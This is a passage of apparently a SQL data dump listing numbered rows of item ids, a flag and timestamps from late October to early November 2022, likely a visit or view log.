15:47:15'),(62954,76,1,'2022-10-29','2022-10-29 15:47:16'),(62955,1722,1,'2022-10-29','2022-10-29 16:13:57'),(62956,3060,1,'2022-10-29','2022-10-29 18:17:15'),(62957,91,1,'2022-10-29','2022-10-29 18:18:23'),(62958,5140,1,'2022-10-29','2022-10-29 18:22:15'),(62959,91,1,'2022-10-29','2022-10-29 18:22:54'),(62960,4870,1,'2022-10-29','2022-10-29 18:24:59'),(62961,91,1,'2022-10-29','2022-10-29 18:25:41'),(62962,2704,1,'2022-10-29','2022-10-29 19:01:24'),(62963,72,1,'2022-10-29','2022-10-29 19:06:39'),(62964,1582,1,'2022-10-29','2022-10-29 19:44:57'),(62965,1602,1,'2022-10-29','2022-10-29 21:59:10'),(62966,72,1,'2022-10-30','2022-10-30 03:06:22'),(62967,4930,1,'2022-10-30','2022-10-30 05:49:15'),(62968,4747,1,'2022-10-30','2022-10-30 06:18:21'),(62969,1612,1,'2022-10-30','2022-10-30 07:47:01'),(62970,1870,1,'2022-10-30','2022-10-30 07:59:36'),(62971,4762,1,'2022-10-30','2022-10-30 08:40:37'),(62972,3030,1,'2022-10-30','2022-10-30 08:45:45'),(62973,72,1,'2022-10-30','2022-10-30 11:06:26'),(62974,4976,1,'2022-10-30','2022-10-30 12:48:02'),(62975,4412,1,'2022-10-30','2022-10-30 13:06:28'),(62976,570,1,'2022-10-30','2022-10-30 13:07:50'),(62977,4412,1,'2022-10-30','2022-10-30 13:52:18'),(62978,80,1,'2022-10-30','2022-10-30 14:53:37'),(62979,1722,1,'2022-10-30','2022-10-30 18:19:07'),(62980,1722,1,'2022-10-30','2022-10-30 18:19:21'),(62981,72,1,'2022-10-30','2022-10-30 19:05:37'),(62982,1586,1,'2022-10-30','2022-10-30 19:18:41'),(62983,1586,1,'2022-10-30','2022-10-30 19:19:36'),(62984,4587,1,'2022-10-30','2022-10-30 19:58:07'),(62985,76,1,'2022-10-30','2022-10-30 20:03:32'),(62986,4587,1,'2022-10-30','2022-10-30 20:08:42'),(62987,108,1,'2022-10-30','2022-10-30 20:09:07'),(62988,4412,1,'2022-10-30','2022-10-30 20:20:59'),(62989,3030,1,'2022-10-30','2022-10-30 20:34:51'),(62990,3030,1,'2022-10-30','2022-10-30 20:34:54'),(62991,4960,1,'2022-10-30','2022-10-30 21:17:55'),(62992,4911,1,'2022-10-30','2022-10-30 21:23:15'),(62993,76,1,'2022-10-30','2022-10-30 21:24:21'),(62994,76,1,'2022-10-30','2022-10-30 21:53:53'),(62995,3531,1,'2022-10-30','2022-10-30 22:08:17'),(62996,1544,1,'2022-10-30','2022-10-30 22:23:50'),(62997,469,1,'2022-10-30','2022-10-30 22:25:16'),(62998,469,1,'2022-10-30','2022-10-30 22:39:24'),(62999,4938,1,'2022-10-30','2022-10-30 23:11:53'),(63000,4323,1,'2022-10-31','2022-10-31 00:52:33'),(63001,2964,1,'2022-10-31','2022-10-31 01:37:07'),(63002,3030,1,'2022-10-31','2022-10-31 04:37:52'),(63003,4674,1,'2022-10-31','2022-10-31 05:21:39'),(63004,4654,1,'2022-10-31','2022-10-31 05:21:46'),(63005,3430,1,'2022-10-31','2022-10-31 05:21:54'),(63006,4668,1,'2022-10-31','2022-10-31 05:22:01'),(63007,4756,1,'2022-10-31','2022-10-31 05:22:07'),(63008,4551,1,'2022-10-31','2022-10-31 05:22:14'),(63009,4706,1,'2022-10-31','2022-10-31 05:22:19'),(63010,4747,1,'2022-10-31','2022-10-31 05:22:24'),(63011,3038,1,'2022-10-31','2022-10-31 05:22:30'),(63012,3438,1,'2022-10-31','2022-10-31 05:22:37'),(63013,4765,1,'2022-10-31','2022-10-31 05:22:44'),(63014,3489,1,'2022-10-31','2022-10-31 05:22:50'),(63015,4691,1,'2022-10-31','2022-10-31 05:22:56'),(63016,3063,1,'2022-10-31','2022-10-31 05:23:03'),(63017,3069,1,'2022-10-31','2022-10-31 05:23:10'),(63018,3752,1,'2022-10-31','2022-10-31 05:23:15'),(63019,5101,1,'2022-10-31','2022-10-31 05:23:21'),(63020,3498,1,'2022-10-31','2022-10-31 05:23:28'),(63021,4759,1,'2022-10-31','2022-10-31 05:23:33'),(63022,4722,1,'2022-10-31','2022-10-31 05:23:38'),(63023,5122,1,'2022-10-31','2022-10-31 05:23:44'),(63024,4517,1,'2022-10-31','2022-10-31 05:23:49'),(63025,3710,1,'2022-10-31','2022-10-31 05:23:54'),(63026,3124,1,'2022-10-31','2022-10-31 05:24:00'),(63027,4977,1,'2022-10-31','2022-10-31 05:24:07'),(63028,4323,1,'2022-10-31','2022-10-31 05:24:17'),(63029,3316,1,'2022-10-31','2022-10-31 05:24:28'),(63030,3724,1,'2022-10-31','2022-10-31 05:24:37'),(63031,3072,1,'2022-10-31','2022-10-31 05:24:47'),(63032,4996,1,'2022-10-31','2022-10-31 05:24:54'),(63033,5128,1,'2022-10-31','2022-10-31 05:25:02'),(63034,4645,1,'2022-10-31','2022-10-31 05:25:08'),(63035,4454,1,'2022-10-31','2022-10-31 05:25:13'),(63036,4341,1,'2022-10-31','2022-10-31 05:25:17'),(63037,4651,1,'2022-10-31','2022-10-31 05:25:22'),(63038,3746,1,'2022-10-31','2022-10-31 05:25:28'),(63039,4648,1,'2022-10-31','2022-10-31 05:25:33'),(63040,4335,1,'2022-10-31','2022-10-31 05:25:37'),(63041,3313,1,'2022-10-31','2022-10-31 05:25:42'),(63042,4753,1,'2022-10-31','2022-10-31 05:25:47'),(63043,3090,1,'2022-10-31','2022-10-31 05:25:51'),(63044,4582,1,'2022-10-31','2022-10-31 05:25:55'),(63045,3738,1,'2022-10-31','2022-10-31 05:26:00'),(63046,3721,1,'2022-10-31','2022-10-31 05:26:04'),(63047,4400,1,'2022-10-31','2022-10-31 05:26:09'),(63048,3774,1,'2022-10-31','2022-10-31 05:26:13'),(63049,4741,1,'2022-10-31','2022-10-31 05:26:17'),(63050,4750,1,'2022-10-31','2022-10-31 05:26:22'),(63051,5137,1,'2022-10-31','2022-10-31 05:26:26'),(63052,4983,1,'2022-10-31','2022-10-31 05:26:31'),(63053,4520,1,'2022-10-31','2022-10-31 05:26:35'),(63054,4332,1,'2022-10-31','2022-10-31 05:26:40'),(63055,4681,1,'2022-10-31','2022-10-31 05:26:45'),(63056,4660,1,'2022-10-31','2022-10-31 05:26:49'),(63057,4685,1,'2022-10-31','2022-10-31 05:26:55'),(63058,4663,1,'2022-10-31','2022-10-31 05:27:00'),(63059,4700,1,'2022-10-31','2022-10-31 05:27:05'),(63060,3749,1,'2022-10-31','2022-10-31 05:27:10'),(63061,4326,1,'2022-10-31','2022-10-31 05:27:15'),(63062,3117,1,'2022-10-31','2022-10-31 05:27:20'),(63063,4694,1,'2022-10-31','2022-10-31 05:27:30'),(63064,4980,1,'2022-10-31','2022-10-31 05:27:51'),(63065,4697,1,'2022-10-31','2022-10-31 05:28:16'),(63066,3771,1,'2022-10-31','2022-10-31 05:28:33'),(63067,3297,1,'2022-10-31','2022-10-31 05:28:47'),(63068,3731,1,'2022-10-31','2022-10-31 05:29:01'),(63069,4514,1,'2022-10-31','2022-10-31 05:29:13'),(63070,3127,1,'2022-10-31','2022-10-31 05:29:20'),(63071,4703,1,'2022-10-31','2022-10-31 05:29:29'),(63072,5131,1,'2022-10-31','2022-10-31 05:29:45'),(63073,4688,1,'2022-10-31','2022-10-31 05:30:01'),(63074,4988,1,'2022-10-31','2022-10-31 05:30:11'),(63075,3060,1,'2022-10-31','2022-10-31 05:30:20'),(63076,4677,1,'2022-10-31','2022-10-31 05:30:33'),(63077,5125,1,'2022-10-31','2022-10-31 05:30:46'),(63078,3777,1,'2022-10-31','2022-10-31 05:30:59'),(63079,3531,1,'2022-10-31','2022-10-31 05:31:09'),(63080,4709,1,'2022-10-31','2022-10-31 05:31:19'),(63081,3534,1,'2022-10-31','2022-10-31 05:31:27'),(63082,4329,1,'2022-10-31','2022-10-31 05:31:45'),(63083,4275,1,'2022-10-31','2022-10-31 05:31:55'),(63084,4771,1,'2022-10-31','2022-10-31 05:32:20'),(63085,4657,1,'2022-10-31','2022-10-31 05:32:37'),(63086,1586,1,'2022-10-31','2022-10-31 07:04:11'),(63087,3030,1,'2022-10-31','2022-10-31 07:06:49'),(63088,3030,1,'2022-10-31','2022-10-31 07:07:02'),(63089,5028,1,'2022-10-31','2022-10-31 08:23:06'),(63090,5028,1,'2022-10-31','2022-10-31 08:23:10'),(63091,5028,1,'2022-10-31','2022-10-31 08:23:42'),(63092,5028,1,'2022-10-31','2022-10-31 08:23:42'),(63093,4335,1,'2022-10-31','2022-10-31 08:35:47'),(63094,5062,1,'2022-10-31','2022-10-31 09:22:30'),(63095,5062,1,'2022-10-31','2022-10-31 09:22:30'),(63096,2904,1,'2022-10-31','2022-10-31 09:23:04'),(63097,2904,1,'2022-10-31','2022-10-31 09:23:04'),(63098,1598,1,'2022-10-31','2022-10-31 09:25:05'),(63099,1586,1,'2022-10-31','2022-10-31 09:45:00'),(63100,5071,1,'2022-10-31','2022-10-31 09:56:56'),(63101,5062,1,'2022-10-31','2022-10-31 10:03:59'),(63102,1544,1,'2022-10-31','2022-10-31 10:39:35'),(63103,80,1,'2022-10-31','2022-10-31 11:04:33'),(63104,80,1,'2022-10-31','2022-10-31 11:04:36'),(63105,1774,1,'2022-10-31','2022-10-31 11:56:01'),(63106,2154,1,'2022-10-31','2022-10-31 12:04:52'),(63107,91,1,'2022-10-31','2022-10-31 12:06:44'),(63108,5062,1,'2022-10-31','2022-10-31 12:11:39'),(63109,5163,1,'2022-10-31','2022-10-31 13:26:19'),(63110,2609,1,'2022-10-31','2022-10-31 14:32:52'),(63111,2609,1,'2022-10-31','2022-10-31 14:33:07'),(63112,2609,1,'2022-10-31','2022-10-31 14:33:22'),(63113,2609,1,'2022-10-31','2022-10-31 14:33:27'),(63114,4747,1,'2022-10-31','2022-10-31 14:41:54'),(63115,3287,1,'2022-10-31','2022-10-31 14:44:34'),(63116,74,1,'2022-10-31','2022-10-31 15:41:01'),(63117,1728,1,'2022-10-31','2022-10-31 16:23:02'),(63118,3267,1,'2022-10-31','2022-10-31 17:01:19'),(63119,68,1,'2022-10-31','2022-10-31 18:04:49'),(63120,5062,1,'2022-10-31','2022-10-31 18:07:11'),(63121,2297,1,'2022-10-31','2022-10-31 19:25:03'),(63122,5058,1,'2022-10-31','2022-10-31 19:38:04'),(63123,5058,1,'2022-10-31','2022-10-31 19:40:21'),(63124,5062,1,'2022-10-31','2022-10-31 19:54:31'),(63125,4420,1,'2022-10-31','2022-10-31 20:46:02'),(63126,91,1,'2022-10-31','2022-10-31 20:48:16'),(63127,2751,1,'2022-10-31','2022-10-31 20:49:59'),(63128,4377,1,'2022-10-31','2022-10-31 20:51:16'),(63129,4412,1,'2022-10-31','2022-10-31 20:51:20'),(63130,2159,1,'2022-10-31','2022-10-31 21:03:12'),(63131,4762,1,'2022-10-31','2022-10-31 22:13:25'),(63132,74,1,'2022-10-31','2022-10-31 22:16:21'),(63133,1600,1,'2022-10-31','2022-10-31 22:22:59'),(63134,4762,1,'2022-10-31','2022-10-31 22:27:38'),(63135,4996,1,'2022-10-31','2022-10-31 22:30:11'),(63136,4762,1,'2022-10-31','2022-10-31 22:31:22'),(63137,4963,1,'2022-11-01','2022-11-01 03:14:24'),(63138,4963,1,'2022-11-01','2022-11-01 03:15:04'),(63139,1739,1,'2022-11-01','2022-11-01 03:36:51'),(63140,1739,1,'2022-11-01','2022-11-01 03:39:09'),(63141,5062,1,'2022-11-01','2022-11-01 05:37:32'),(63142,5028,1,'2022-11-01','2022-11-01 05:37:54'),(63143,3104,1,'2022-11-01','2022-11-01 06:01:07'),(63144,3104,1,'2022-11-01','2022-11-01 06:04:06'),(63145,5062,1,'2022-11-01','2022-11-01 06:11:52'),(63146,5062,1,'2022-11-01','2022-11-01 06:12:03'),(63147,4870,1,'2022-11-01','2022-11-01 06:14:54'),(63148,1610,1,'2022-11-01','2022-11-01 06:50:04'),(63149,1610,1,'2022-11-01','2022-11-01 06:50:04'),(63150,4323,1,'2022-11-01','2022-11-01 07:12:12'),(63151,3004,1,'2022-11-01','2022-11-01 07:28:16'),(63152,5062,1,'2022-11-01','2022-11-01 08:08:59'),(63153,5062,1,'2022-11-01','2022-11-01 08:08:59'),(63154,74,1,'2022-11-01','2022-11-01 08:09:36'),(63155,74,1,'2022-11-01','2022-11-01 08:09:37'),(63156,4762,1,'2022-11-01','2022-11-01 08:55:30'),(63157,4762,1,'2022-11-01','2022-11-01 08:55:31'),(63158,4980,1,'2022-11-01','2022-11-01 09:16:32'),(63159,5140,1,'2022-11-01','2022-11-01 09:51:11'),(63160,3104,1,'2022-11-01','2022-11-01 09:56:58'),(63161,2658,1,'2022-11-01','2022-11-01 10:14:45'),(63162,2658,1,'2022-11-01','2022-11-01 10:15:48'),(63163,2658,1,'2022-11-01','2022-11-01 10:16:07'),(63164,2658,1,'2022-11-01','2022-11-01 10:19:45'),(63165,4930,1,'2022-11-01','2022-11-01 10:20:10'),(63166,87,1,'2022-11-01','2022-11-01 10:20:42'),(63167,474,1,'2022-11-01','2022-11-01 10:21:29'),(63168,87,1,'2022-11-01','2022-11-01 10:21:53'),(63169,473,1,'2022-11-01','2022-11-01 10:21:59'),(63170,89,1,'2022-11-01','2022-11-01 10:22:49'),(63171,91,1,'2022-11-01','2022-11-01 10:23:34'),(63172,89,1,'2022-11-01','2022-11-01 10:23:36'),(63173,91,1,'2022-11-01','2022-11-01 10:23:48'),(63174,80,1,'2022-11-01','2022-11-01 10:23:56'),(63175,89,1,'2022-11-01','2022-11-01 10:24:17'),(63176,89,1,'2022-11-01','2022-11-01 10:24:43'),(63177,68,1,'2022-11-01','2022-11-01 10:25:01'),(63178,89,1,'2022-11-01','2022-11-01 10:27:14'),(63179,80,1,'2022-11-01','2022-11-01 10:27:39'),(63180,87,1,'2022-11-01','2022-11-01 10:33:46'),(63181,486,1,'2022-11-01','2022-11-01 10:34:06'),(63182,87,1,'2022-11-01','2022-11-01 10:34:34'),(63183,487,1,'2022-11-01','2022-11-01 10:34:38'),(63184,87,1,'2022-11-01','2022-11-01 10:34:44'),(63185,482,1,'2022-11-01','2022-11-01 10:34:51'),(63186,87,1,'2022-11-01','2022-11-01 10:34:56'),(63187,468,1,'2022-11-01','2022-11-01 10:35:03'),(63188,5062,1,'2022-11-01','2022-11-01 10:39:57'),(63189,4416,1,'2022-11-01','2022-11-01 10:40:39'),(63190,5028,1,'2022-11-01','2022-11-01 10:41:55'),(63191,5028,1,'2022-11-01','2022-11-01 10:42:03'),(63192,4762,1,'2022-11-01','2022-11-01 10:43:03'),(63193,5028,1,'2022-11-01','2022-11-01 10:51:07'),(63194,4980,1,'2022-11-01','2022-11-01 10:56:56'),(63195,5028,1,'2022-11-01','2022-11-01 11:02:37'),(63196,1588,1,'2022-11-01','2022-11-01 11:48:13'),(63197,1588,1,'2022-11-01','2022-11-01 11:48:58'),(63198,570,1,'2022-11-01','2022-11-01 12:00:15'),(63199,1588,1,'2022-11-01','2022-11-01 12:17:00'),(63200,1544,1,'2022-11-01','2022-11-01 12:30:22'),(63201,1544,1,'2022-11-01','2022-11-01 12:30:22'),(63202,1594,1,'2022-11-01','2022-11-01 12:32:30'),(63203,1588,1,'2022-11-01','2022-11-01 12:41:08'),(63204,3764,1,'2022-11-01','2022-11-01 13:13:15'),(63205,1724,1,'2022-11-01','2022-11-01 14:40:33'),(63206,1724,1,'2022-11-01','2022-11-01 14:40:40'),(63207,1724,1,'2022-11-01','2022-11-01 14:41:06'),(63208,3764,1,'2022-11-01','2022-11-01 15:17:39'),(63209,1745,1,'2022-11-01','2022-11-01 15:20:16'),(63210,68,1,'2022-11-01','2022-11-01 15:31:42'),(63211,570,1,'2022-11-01','2022-11-01 15:55:22'),(63212,1592,1,'2022-11-01','2022-11-01 17:06:14'),(63213,1582,1,'2022-11-01','2022-11-01 17:34:09'),(63214,4524,1,'2022-11-01','2022-11-01 20:59:25'),(63215,1544,1,'2022-11-01','2022-11-01 21:28:21'),(63216,80,1,'2022-11-01','2022-11-01 21:29:26'),(63217,1544,1,'2022-11-01','2022-11-01 21:31:24'),(63218,76,1,'2022-11-01','2022-11-01 21:31:32'),(63219,1544,1,'2022-11-01','2022-11-01 21:32:24'),(63220,4930,1,'2022-11-01','2022-11-01 21:32:37'),(63221,4944,1,'2022-11-01','2022-11-01 21:33:13'),(63222,4930,1,'2022-11-01','2022-11-01 21:33:33'),(63223,4966,1,'2022-11-01','2022-11-01 21:33:38'),(63224,4930,1,'2022-11-01','2022-11-01 21:34:05'),(63225,4963,1,'2022-11-01','2022-11-01 21:34:11'),(63226,4930,1,'2022-11-01','2022-11-01 21:35:14'),(63227,4960,1,'2022-11-01','2022-11-01 21:35:18'),(63228,4930,1,'2022-11-01','2022-11-01 21:36:05'),(63229,4950,1,'2022-11-01','2022-11-01 21:36:10'),(63230,4930,1,'2022-11-01','2022-11-01 21:37:09'),(63231,4944,1,'2022-11-01','2022-11-01 21:37:20'),(63232,4930,1,'2022-11-01','2022-11-01 21:38:03'),(63233,4941,1,'2022-11-01','2022-11-01 21:38:08'),(63234,4930,1,'2022-11-01','2022-11-01 21:39:03'),(63235,4938,1,'2022-11-01','2022-11-01 21:39:08'),(63236,4930,1,'2022-11-01','2022-11-01 21:40:22'),(63237,4911,1,'2022-11-01','2022-11-01 21:40:29'),(63238,91,1,'2022-11-01','2022-11-01 21:42:58'),(63239,4911,1,'2022-11-01','2022-11-01 21:43:51'),(63240,4930,1,'2022-11-01','2022-11-01 21:43:57'),(63241,1544,1,'2022-11-01','2022-11-01 21:43:58'),(63242,1722,1,'2022-11-02','2022-11-02 00:10:44'),(63243,1724,1,'2022-11-02','2022-11-02 03:56:31'),(63244,1612,1,'2022-11-02','2022-11-02 06:35:19'),(63245,1612,1,'2022-11-02','2022-11-02 06:44:11'),(63246,4457,1,'2022-11-02','2022-11-02 09:34:48'),(63247,570,1,'2022-11-02','2022-11-02 10:38:45'),(63248,2457,1,'2022-11-02','2022-11-02 14:01:20'),(63249,4457,1,'2022-11-02','2022-11-02 14:07:26'),(63250,1588,1,'2022-11-02','2022-11-02 14:42:49'),(63251,1614,1,'2022-11-02','2022-11-02 15:50:13'),(63252,3764,1,'2022-11-02','2022-11-02 16:34:39'),(63253,2609,1,'2022-11-02','2022-11-02 16:59:22'),(63254,2609,1,'2022-11-02','2022-11-02 16:59:43'),(63255,1596,1,'2022-11-02','2022-11-02 17:35:44'),(63256,4332,1,'2022-11-02','2022-11-02 18:50:41'),(63257,477,1,'2022-11-02','2022-11-02 23:21:42'),(63258,5001,1,'2022-11-03','2022-11-03 02:11:40'),(63259,1586,1,'2022-11-03','2022-11-03 06:11:51'),(63260,1586,1,'2022-11-03','2022-11-03 06:14:19'),(63261,4323,1,'2022-11-03','2022-11-03 06:15:04'),(63262,1614,1,'2022-11-03','2022-11-03 08:39:51'),(63263,1724,1,'2022-11-03','2022-11-03 09:26:05'),(63264,1724,1,'2022-11-03','2022-11-03 09:26:15'),(63265,5076,1,'2022-11-03','2022-11-03 09:41:36'),(63266,3764,1,'2022-11-03','2022-11-03 10:13:56'),(63267,5163,1,'2022-11-03','2022-11-03 11:00:00'),(63268,76,1,'2022-11-03','2022-11-03 11:13:54'),(63269,2704,1,'2022-11-03','2022-11-03 11:29:53'),(63270,2769,1,'2022-11-03','2022-11-03 12:10:57'),(63271,2769,1,'2022-11-03','2022-11-03 12:11:09'),(63272,2769,1,'2022-11-03','2022-11-03 12:11:13'),(63273,1604,1,'2022-11-03','2022-11-03 14:42:11'),(63274,80,1,'2022-11-03','2022-11-03 15:25:58'),(63275,1598,1,'2022-11-03','2022-11-03 16:53:06'),(63276,2911,1,'2022-11-03','2022-11-03 16:56:44'),(63277,2911,1,'2022-11-03','2022-11-03 16:57:15'),(63278,2769,1,'2022-11-03','2022-11-03 18:23:00'),(63279,1544,1,'2022-11-03','2022-11-03 19:40:31'),(63280,1594,1,'2022-11-03','2022-11-03 19:43:58'),(63281,2801,1,'2022-11-03','2022-11-03 19:52:58'),(63282,4762,1,'2022-11-03','2022-11-03 20:33:18'),(63283,4996,1,'2022-11-03','2022-11-03 20:35:47'),(63284,4762,1,'2022-11-03','2022-11-03 20:36:04'),(63285,1614,1,'2022-11-03','2022-11-03 20:41:42'),(63286,477,1,'2022-11-03','2022-11-03 20:57:31'),(63287,4416,1,'2022-11-03','2022-11-03 22:14:39'),(63288,4335,1,'2022-11-03','2022-11-03 22:49:13'),(63289,87,1,'2022-11-04','2022-11-04 00:31:02'),(63290,3781,1,'2022-11-04','2022-11-04 03:36:52'),(63291,1612,1,'2022-11-04','2022-11-04 04:38:38'),(63292,3083,1,'2022-11-04','2022-11-04 06:29:00'),(63293,2751,1,'2022-11-04','2022-11-04 06:29:33'),(63294,3083,1,'2022-11-04','2022-11-04 06:29:38'),(63295,4966,1,'2022-11-04','2022-11-04 07:09:52'),(63296,80,1,'2022-11-04','2022-11-04 07:10:44'),(63297,108,1,'2022-11-04','2022-11-04 07:25:27'),(63298,4938,1,'2022-11-04','2022-11-04 07:43:28'),(63299,4966,1,'2022-11-04','2022-11-04 08:33:14'),(63300,1592,1,'2022-11-04','2022-11-04 09:06:59'),(63301,1602,1,'2022-11-04','2022-11-04 10:14:18'),(63302,1602,1,'2022-11-04','2022-11-04 10:14:32'),(63303,4963,1,'2022-11-04','2022-11-04 10:50:05'),(63304,1766,1,'2022-11-04','2022-11-04 11:40:19'),(63305,1606,1,'2022-11-04','2022-11-04 12:23:20'),(63306,4938,1,'2022-11-04','2022-11-04 12:27:27'),(63307,91,1,'2022-11-04','2022-11-04 12:28:28'),(63308,4938,1,'2022-11-04','2022-11-04 12:29:13'),(63309,89,1,'2022-11-04','2022-11-04 12:29:23'),(63310,4938,1,'2022-11-04','2022-11-04 12:29:52'),(63311,1728,1,'2022-11-04','2022-11-04 12:51:15'),(63312,4960,1,'2022-11-04','2022-11-04 13:30:20'),(63313,4930,1,'2022-11-04','2022-11-04 13:31:21'),(63314,4960,1,'2022-11-04','2022-11-04 13:31:44'),(63315,4238,1,'2022-11-04','2022-11-04 13:34:26'),(63316,3275,1,'2022-11-04','2022-11-04 13:40:14'),(63317,108,1,'2022-11-04','2022-11-04 13:53:17'),(63318,1586,1,'2022-11-04','2022-11-04 14:38:18'),(63319,3041,1,'2022-11-04','2022-11-04 15:23:16'),(63320,1588,1,'2022-11-04','2022-11-04 16:07:54'),(63321,1774,1,'2022-11-04','2022-11-04 16:26:12'),(63322,1774,1,'2022-11-04','2022-11-04 16:26:34'),(63323,1774,1,'2022-11-04','2022-11-04 16:27:14'),(63324,3102,1,'2022-11-04','2022-11-04 17:12:12'),(63325,2965,1,'2022-11-04','2022-11-04 17:38:20'),(63326,2769,1,'2022-11-04','2022-11-04 17:50:21'),(63327,1598,1,'2022-11-04','2022-11-04 18:01:36'),(63328,468,1,'2022-11-04','2022-11-04 18:23:20'),(63329,1584,1,'2022-11-04','2022-11-04 18:34:01'),(63330,3107,1,'2022-11-04','2022-11-04 18:45:05'),(63331,1612,1,'2022-11-04','2022-11-04 19:22:26'),(63332,1612,1,'2022-11-04','2022-11-04 19:34:10'),(63333,3072,1,'2022-11-04','2022-11-04 22:23:35'),(63334,91,1,'2022-11-04','2022-11-04 22:25:39'),(63335,4888,1,'2022-11-04','2022-11-04 22:26:45'),(63336,4591,1,'2022-11-04','2022-11-04 22:27:32'),(63337,4542,1,'2022-11-04','2022-11-04 22:28:44'),(63338,4357,1,'2022-11-04','2022-11-04 22:31:36'),(63339,89,1,'2022-11-04','2022-11-04 22:33:03'),(63340,89,1,'2022-11-04','2022-11-04 22:33:23'),(63341,3083,1,'2022-11-04','2022-11-04 22:33:44'),(63342,2904,1,'2022-11-04','2022-11-04 23:39:12'),(63343,3694,1,'2022-11-05','2022-11-05 05:18:12'),(63344,4756,1,'2022-11-05','2022-11-05 05:58:38'),(63345,80,1,'2022-11-05','2022-11-05 06:18:24'),(63346,80,1,'2022-11-05','2022-11-05 06:29:52'),(63347,80,1,'2022-11-05','2022-11-05 06:38:18'),(63348,1606,1,'2022-11-05','2022-11-05 06:44:52'),(63349,4741,1,'2022-11-05','2022-11-05 06:45:41'),(63350,80,1,'2022-11-05','2022-11-05 06:46:02'),(63351,1606,1,'2022-11-05','2022-11-05 06:49:16'),(63352,4744,1,'2022-11-05','2022-11-05 07:28:37'),(63353,68,1,'2022-11-05','2022-11-05 07:52:57'),(63354,4762,1,'2022-11-05','2022-11-05 08:00:53'),(63355,4765,1,'2022-11-05','2022-11-05 08:30:31'),(63356,4335,1,'2022-11-05','2022-11-05 09:34:45'),(63357,3030,1,'2022-11-05','2022-11-05 09:43:27'),(63358,4771,1,'2022-11-05','2022-11-05 10:58:07'),(63359,4963,1,'2022-11-05','2022-11-05 10:59:39'),(63360,1747,1,'2022-11-05','2022-11-05 11:27:52'),(63361,468,1,'2022-11-05','2022-11-05 11:58:41'),(63362,1596,1,'2022-11-05','2022-11-05 12:19:35'),(63363,80,1,'2022-11-05','2022-11-05 12:19:57'),(63364,2801,1,'2022-11-05','2022-11-05 12:58:39'),(63365,4966,1,'2022-11-05','2022-11-05 13:02:06'),(63366,4323,1,'2022-11-05','2022-11-05 13:28:29'),(63367,4703,1,'2022-11-05','2022-11-05 13:29:19'),(63368,4930,1,'2022-11-05','2022-11-05 15:34:44'),(63369,4911,1,'2022-11-05','2022-11-05 15:36:37'),(63370,1695,1,'2022-11-05','2022-11-05 16:02:39'),(63371,89,1,'2022-11-05','2022-11-05 16:05:28'),(63372,89,1,'2022-11-05','2022-11-05 16:06:14'),(63373,1610,1,'2022-11-05','2022-11-05 16:07:02'),(63374,89,1,'2022-11-05','2022-11-05 16:07:32'),(63375,89,1,'2022-11-05','2022-11-05 16:07:53'),(63376,76,1,'2022-11-05','2022-11-05 16:08:06'),(63377,72,1,'2022-11-05','2022-11-05 16:08:57'),(63378,2503,1,'2022-11-05','2022-11-05 16:11:22'),(63379,1594,1,'2022-11-05','2022-11-05 16:24:19'),(63380,1586,1,'2022-11-05','2022-11-05 16:34:14'),(63381,4938,1,'2022-11-05','2022-11-05 17:11:14'),(63382,4938,1,'2022-11-05','2022-11-05 17:11:57'),(63383,3107,1,'2022-11-05','2022-11-05 17:18:53'),(63384,1715,1,'2022-11-05','2022-11-05 17:58:53'),(63385,3083,1,'2022-11-05','2022-11-05 18:10:43'),(63386,3273,1,'2022-11-05','2022-11-05 19:40:42'),(63387,4457,1,'2022-11-05','2022-11-05 20:00:36'),(63388,80,1,'2022-11-05','2022-11-05 20:01:15'),(63389,4457,1,'2022-11-05','2022-11-05 20:01:28'),(63390,3030,1,'2022-11-05','2022-11-05 21:01:04'),(63391,1602,1,'2022-11-05','2022-11-05 22:04:45'),(63392,1602,1,'2022-11-05','2022-11-05 22:04:52'),(63393,1608,1,'2022-11-05','2022-11-05 22:08:31'),(63394,1602,1,'2022-11-05','2022-11-05 22:08:36'),(63395,1600,1,'2022-11-06','2022-11-06 00:29:52'),(63396,4966,1,'2022-11-06','2022-11-06 01:05:58'),(63397,4966,1,'2022-11-06','2022-11-06 02:50:40'),(63398,3124,1,'2022-11-06','2022-11-06 04:54:09'),(63399,1606,1,'2022-11-06','2022-11-06 06:23:45'),(63400,3117,1,'2022-11-06','2022-11-06 07:54:45'),(63401,4448,1,'2022-11-06','2022-11-06 09:23:06'),(63402,2804,1,'2022-11-06','2022-11-06 09:23:50'),(63403,4976,1,'2022-11-06','2022-11-06 10:33:35'),(63404,3764,1,'2022-11-06','2022-11-06 11:22:45'),(63405,5122,1,'2022-11-06','2022-11-06 13:52:57'),(63406,467,1,'2022-11-06','2022-11-06 16:41:41'),(63407,68,1,'2022-11-06','2022-11-06 17:12:06'),(63408,472,1,'2022-11-06','2022-11-06 21:53:55'),(63409,4950,1,'2022-11-06','2022-11-06 22:27:15'),(63410,4996,1,'2022-11-06','2022-11-06 22:52:51'),(63411,1610,1,'2022-11-06','2022-11-06 23:53:55'),(63412,1594,1,'2022-11-07','2022-11-07 00:49:41'),(63413,4582,1,'2022-11-07','2022-11-07 02:24:41'),(63414,4911,1,'2022-11-07','2022-11-07 08:10:33'),(63415,4911,1,'2022-11-07','2022-11-07 08:10:47'),(63416,1606,1,'2022-11-07','2022-11-07 08:45:28'),(63417,3781,1,'2022-11-07','2022-11-07 10:27:22'),(63418,5042,1,'2022-11-07','2022-11-07 10:48:54'),(63419,2804,1,'2022-11-07','2022-11-07 10:57:18'),(63420,1602,1,'2022-11-07','2022-11-07 11:57:39'),(63421,2309,1,'2022-11-07','2022-11-07 12:42:28'),(63422,2309,1,'2022-11-07','2022-11-07 12:42:40'),(63423,2309,1,'2022-11-07','2022-11-07 12:43:03'),(63424,4612,1,'2022-11-07','2022-11-07 12:53:01'),(63425,3102,1,'2022-11-07','2022-11-07 14:00:51'),(63426,1718,1,'2022-11-07','2022-11-07 16:18:00'),(63427,1718,1,'2022-11-07','2022-11-07 16:18:17'),(63428,1612,1,'2022-11-07','2022-11-07 17:31:19'),(63429,80,1,'2022-11-07','2022-11-07 17:51:51'),(63430,1614,1,'2022-11-07','2022-11-07 17:52:28'),(63431,74,1,'2022-11-07','2022-11-07 17:55:05'),(63432,4432,1,'2022-11-07','2022-11-07 20:52:02'),(63433,1722,1,'2022-11-07','2022-11-07 21:12:43'),(63434,1722,1,'2022-11-07','2022-11-07 21:13:12'),(63435,1722,1,'2022-11-07','2022-11-07 21:13:44'),(63436,570,1,'2022-11-07','2022-11-07 22:35:12'),(63437,1722,1,'2022-11-07','2022-11-07 23:00:53'),(63438,1877,1,'2022-11-07','2022-11-07 23:54:03'),(63439,4938,1,'2022-11-08','2022-11-08 